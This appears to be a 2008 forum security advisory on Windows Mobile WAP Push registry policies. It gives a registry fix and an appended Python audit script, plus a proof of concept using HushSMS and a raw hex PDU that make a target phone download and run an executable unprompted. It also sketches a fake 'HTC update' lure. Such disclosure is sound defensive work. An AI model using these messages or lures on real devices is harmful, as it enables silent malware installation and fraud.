Windows Mobile Security Advisory: Manufacturers leave device open for WAP-Push based attacks
--------------------------------------------------------------------------------------------
Description:
------------
WAP Push SI (Service Indication) and SL (Service Load) are so-called "Service SMS". These messages are used by operators to notify about software updates or to deploy them directly. Microsoft implemented a security policy to ensure that these messages are accepted only from trusted originators. This policy is defined in the device registry. If improper settings are applied to this policy, attackers can send malicious content to the device, which then displays or executes the content immediately. This leaves the device open for further attack scenarios.
Workaround / Fixes:
-------------------
Open your device registry and navigate to:
HKLM\Security\Policies\Policies
Check the values of the following DWORDs:
0x0000100c
and
0x0000100d
Microsoft recommends the following values for these:
0x0000100c : 0x800
0x0000100d : 0xc00
If they are, for example, 0x840 and 0xc40, your device is wide open and vulnerable. Change the keys to the Microsoft recommendation. They are effective immediately.
Proof of concept:
-----------------
For testing purposes, check the above registry keys and set them to a faulty value (like the above 0x840 and 0xc40). Then use a program like PDUSpy or HushSMS to do some testing.
HushSMS is able to send this kind of message from Windows Mobile based devices.
Get HushSMS from http://www.silentservices.de/HushSMS.html
Download the latest version (currently v0.6beta) and install it on your device.
Execute HushSMS and type in the number of the recipient Windows Mobile phone.
In the message body field type in the following (note without a leading HTTP://!!!):
www.silentservices.de/wapsltest.exe
Click Send->Send WAPSL
Watch your target device. If it starts connecting via GPRS, it will then download the above sample program and execute it immediately without user interaction.
If you want to test your target device with PDUSpy, use the following sample message:
UDH: 05040b8423f0
Message(hex):
DC0605B0AF82B48302066A008509037777772e73696c656e7473657276696365732e64652f77617074657374736c2e65786
5000501
Edit: Added a youtube video in post #4
EDIT 19.09.2008: Some clarifications
Well, I received my brand new Raphael two weeks ago and guess what, the values set by HTC by default are even worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
This means in detail:
Accept WAP Push Service Load messages originating from authenticated and trusted PPGs (Push Proxy Gateways) AND any.
Accept WAP Push Service Indication messages originating from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However, some may say: "Hey, that's not that bad, I have Opera set as my default browser and Opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my Opera window."
Well, this is fine for people who "know what they are doing", but it is not for all these other people out there that are using these devices and don't even have a clue about what WAP Push is or what a security policy is, or simply don't mind clicking "accept" each time a message pops up (and trust me when I say there are more people like this out there than you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text: "HTC has to inform you about a critical security update. Download it at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their Opera browser?
And what about people that don't have Opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vulnerability in Opera Mobile is discovered that can be exploited if the user visits a malicious webpage. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpage that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers
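
The registry check from the Workaround section, automated as an added example (not part of the original post and not code from Microsoft or HTC): it reads a registry export, compares policies 0x100c and 0x100d with the recommended values and reports which bits deviate. The .reg-style export format, the eight-hex-digit value names and all function names are assumptions; the sample input is constructed from the HTC defaults quoted in the edit above.

```python
import re

# Recommended values from the advisory (policy id -> role mask).
RECOMMENDED = {0x100C: 0x800, 0x100D: 0xC00}
# Labels follow the advisory's wording: 0x100c governs SL, 0x100d governs SI.
LABELS = {0x100C: "WAP Push Service Load (SL)",
          0x100D: "WAP Push Service Indication (SI)"}
POLICY_KEY = r"hkey_local_machine\security\policies\policies"
# Assumed export line format: "0000100c"=dword:00000840 (optional 0x prefix).
VALUE_RE = re.compile(r'^"(?:0x)?([0-9a-f]{8})"=dword:([0-9a-f]{8})$', re.I)

def parse_reg_export(text):
    """Return {policy_id: value} for DWORDs under the policy key of an export."""
    values, in_key = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.strip("[]").lower() == POLICY_KEY
        elif in_key:
            m = VALUE_RE.match(line)
            if m:
                values[int(m.group(1), 16)] = int(m.group(2), 16)
    return values

def audit(values):
    """List (policy, status, extra_bits, absent_bits) for every deviation."""
    findings = []
    for pid, want in RECOMMENDED.items():
        got = values.get(pid)
        if got is None:
            findings.append((pid, "missing", 0, 0))
            continue
        extra, absent = got & ~want, want & ~got
        if extra or absent:
            findings.append((pid, "deviates", extra, absent))
    return findings

# Constructed sample: the HTC defaults reported in the post's edit.
SAMPLE = r'''
[HKEY_LOCAL_MACHINE\Security\Policies\Policies]
"0000100c"=dword:00000840
"0000100d"=dword:00000040
'''

if __name__ == "__main__":
    for pid, status, extra, absent in audit(parse_reg_export(SAMPLE)):
        print(f"{LABELS[pid]} 0x{pid:04x}: {status}, "
              f"extra bits 0x{extra:x}, absent bits 0x{absent:x}")
```

Any extra bit means the policy accepts messages from more originators than recommended; on the sample both policies carry the extra bit 0x40.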